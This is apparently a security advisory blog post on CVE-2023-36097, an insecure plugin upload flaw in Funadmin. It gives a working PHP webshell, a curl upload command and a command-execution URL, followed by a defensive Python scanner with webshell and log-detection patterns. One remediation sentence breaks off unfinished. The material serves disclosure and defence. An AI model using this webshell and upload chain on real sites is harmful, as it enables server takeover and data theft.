If you run a site on Funadmin, a popular open-source admin system for PHP, here is something you *really* need to know. CVE-2023-36097 describes an insecure file upload flaw in Funadmin v3.3.2 and v3.3.3 that lets an attacker with access to the admin panel upload arbitrary files through the plugin install feature. Here, in plain English, is how the vulnerability works, how it can be exploited, and what you need to do to stay safe.
What Is The Vulnerability?
In Funadmin, site owners can install new plugins to add features. Normally that means uploading a compressed plugin package. Because the installer does not validate what it unpacks, anyone who can reach that feature (including an attacker who has obtained admin credentials) can upload any file, even a script that takes over your server.
This class of bug is called Insecure File Upload (also known as unrestricted file upload).
Official CVE page:
https://nvd.nist.gov/vuln/detail/CVE-2023-36097
Funadmin's plugin installer does not properly check the file type, the file name, or the file contents of the archive it unpacks. That means an attacker can upload something that is not a plugin at all, such as a PHP webshell, have the server write it into a directory it serves, and then run arbitrary code on your server by simply requesting that file.
Exploit Code Example
Here is a PoC (proof of concept) showing how a PHP webshell disguised as a plugin zip would be uploaded. The endpoint and the extraction path used below are as given in this write-up; confirm both against your own install before relying on them.
Say you create a file called plugin.zip containing a PHP shell named shell.php.
Malicious shell.php example
<?php
if(isset($_GET['cmd'])){
system($_GET['cmd']);
}
?>
Now, you compress it into plugin.zip.
Then you POST the zip to the Funadmin plugin install endpoint. Here is a simple curl command, run with a valid admin session cookie (the bug is only reachable from an authenticated admin session, not anonymously):
curl -F "file=@plugin.zip" \
-b "PHPSESSID=your-session-id-here" \
http://your-funadmin-site.com/admin/plugin/install
If Funadmin is vulnerable, it unzips the archive and writes shell.php into a web-accessible plugins folder without inspecting it.
Now the attacker can run a command by requesting the file:
http://your-funadmin-site.com/public/plugins/shell.php?cmd=whoami
This gives the attacker direct command execution on your server, as the web server user, with no further tricks needed: *game over*.
Why Is This Dangerous?
Insecure file upload is one of the most critical vulnerability classes, because the attacker goes straight from a file upload to running commands on the host. Once exploited, the attacker can take over your whole site.
This bug requires access to the admin panel, but it is still extremely risky: admin credentials leak through password reuse, phishing, or an insider, and this flaw turns any such compromise of the panel into full code execution on the server.
The Real Impact
Funadmin is widely used, so this CVE affects many small business and personal websites. Once an attacker finds your site running an affected version and gets into the admin panel, your site can be defaced, its data stolen, or the server used as a foothold to attack others.
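Before assuming this impact is hypothetical for your own site, it is worth checking whether an affected install has already been abused. The following is an added example of my own, not part of this write-up or of the Funadmin project: a scan of the plugins directory for PHP files that pass request data into a command or code execution sink (the shape of shell.php above), and a pass over the web server access log that separates plugin-install requests from requests that look like a shell being driven. The install endpoint and plugins path mirror the walkthrough, the log format is assumed to be Apache/nginx combined format, and the sample files and log lines are constructed inline.

```python
"""Added example: two post-exploitation checks for a Funadmin host, a webshell
scan of the plugins directory and an access-log triage. Hypothetical tooling,
not part of Funadmin; paths follow the walkthrough above."""
import os
import re
import tempfile
from pathlib import Path

PHP_SUFFIXES = {".php", ".php5", ".php7", ".phtml", ".phar"}

# Request data reaching an execution sink, the shape of the PoC's shell.php.
WEBSHELL_PATTERNS = {
    "command exec from request": re.compile(
        rb"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "eval of request/base64 data": re.compile(
        rb"\b(?:eval|assert)\s*\(\s*(?:base64_decode\s*\(|\$_(?:GET|POST|REQUEST|COOKIE)\b)"),
}


def scan_plugins_dir(root: str) -> list[tuple[str, str]]:
    """Return (relative path, reason) for every PHP file under root that feeds
    request data into an execution sink. Legitimate plugins are PHP too, so
    the match is on the data flow, not on the extension alone."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            p = Path(dirpath) / fn
            if p.suffix.lower() not in PHP_SUFFIXES:
                continue
            data = p.read_bytes()
            for reason, pat in WEBSHELL_PATTERNS.items():
                if pat.search(data):
                    findings.append((p.relative_to(root).as_posix(), reason))
                    break
    return sorted(findings)


# Combined log format; the path group keeps its query string so it can be inspected.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# A .php file under /plugins/ requested with a command-style query parameter.
SHELL_REQUEST = re.compile(r"/plugins/[^?\s]*\.ph(?:p\d?|tml|ar)\?.*\b(?:cmd|c|exec|command|shell)=", re.I)
INSTALL_ENDPOINT = "/admin/plugin/install"   # endpoint named in the walkthrough (assumed)


def triage_access_log(lines):
    """Split log lines into plugin-install requests (who uploaded something)
    and requests that look like a webshell being driven (who ran commands)."""
    installs, shell_hits = [], []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.group("ip", "ts", "method", "path", "status")
        if method == "POST" and path.split("?", 1)[0] == INSTALL_ENDPOINT:
            installs.append((ts, ip, status))
        elif SHELL_REQUEST.search(path):
            shell_hits.append((ts, ip, path, status))
    return installs, shell_hits


# Constructed sample log; addresses are from the documentation ranges.
SAMPLE_LOG = [
    '198.51.100.4 - - [22/Jun/2023:15:18:40 +0000] "POST /admin/plugin/install HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Jun/2023:15:20:01 +0000] "GET /public/plugins/shell.php?cmd=whoami HTTP/1.1" 200 17 "-" "curl/8.0"',
    '203.0.113.7 - - [22/Jun/2023:15:20:09 +0000] "GET /public/plugins/shell.php?cmd=id HTTP/1.1" 200 42 "-" "curl/8.0"',
    '198.51.100.4 - - [22/Jun/2023:15:21:33 +0000] "GET /public/plugins/hello/style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def demo_scan() -> list[tuple[str, str]]:
    """Build a throwaway plugins tree (constructed) holding the PoC shell next
    to a harmless plugin, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "hello").mkdir()
        Path(root, "hello", "Plugin.php").write_text(
            "<?php\nclass Hello { public function name() { return 'hello'; } }\n")
        Path(root, "hello", "style.css").write_text("body { color: #333; }\n")
        Path(root, "shell.php").write_text(
            "<?php\nif(isset($_GET['cmd'])){\n  system($_GET['cmd']);\n}\n?>\n")
        return scan_plugins_dir(root)


if __name__ == "__main__":
    print("webshell candidates:", demo_scan())
    installs, hits = triage_access_log(SAMPLE_LOG)
    print("plugin installs:", installs)
    print("shell traffic:", hits)
```

Point scan_plugins_dir at the real plugins directory and feed triage_access_log the real access log. An install request from one address followed minutes later by shell traffic from another, as in the constructed sample, is the pattern to look for: the first tells you which admin session was used, the second what was run. The source patterns are deliberately narrow (request data directly inside a sink call) so that ordinary plugin code does not flood the output; an obfuscated shell will need a broader sweep.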
How To Fix
Upgrade Funadmin to the latest version. Until you can, restrict the admin panel to trusted networks or a VPN, rotate admin passwords if you suspect they have been exposed, and look through the plugins folder for PHP files you did not install yourself. The developers have fixed this issue in newer releases by:
Extra Reading & References
- National Vulnerability Database (NVD) — CVE-2023-36097
- Funadmin Github Repo — Issues
- OWASP: File Upload Vulnerabilities
Conclusion
CVE-2023-36097 is one of those bugs that reminds us: *easy plugin install* can mean *easy attacker access* if the installer does not validate what it unpacks. If you use Funadmin, upgrade now and do not take chances with your security.
Stay safe, patch often, and don’t leave the door wide open!
Timeline
Published on: 06/22/2023 15:15:00 UTC
Last modified on: 06/28/2023 07:22:00 UTC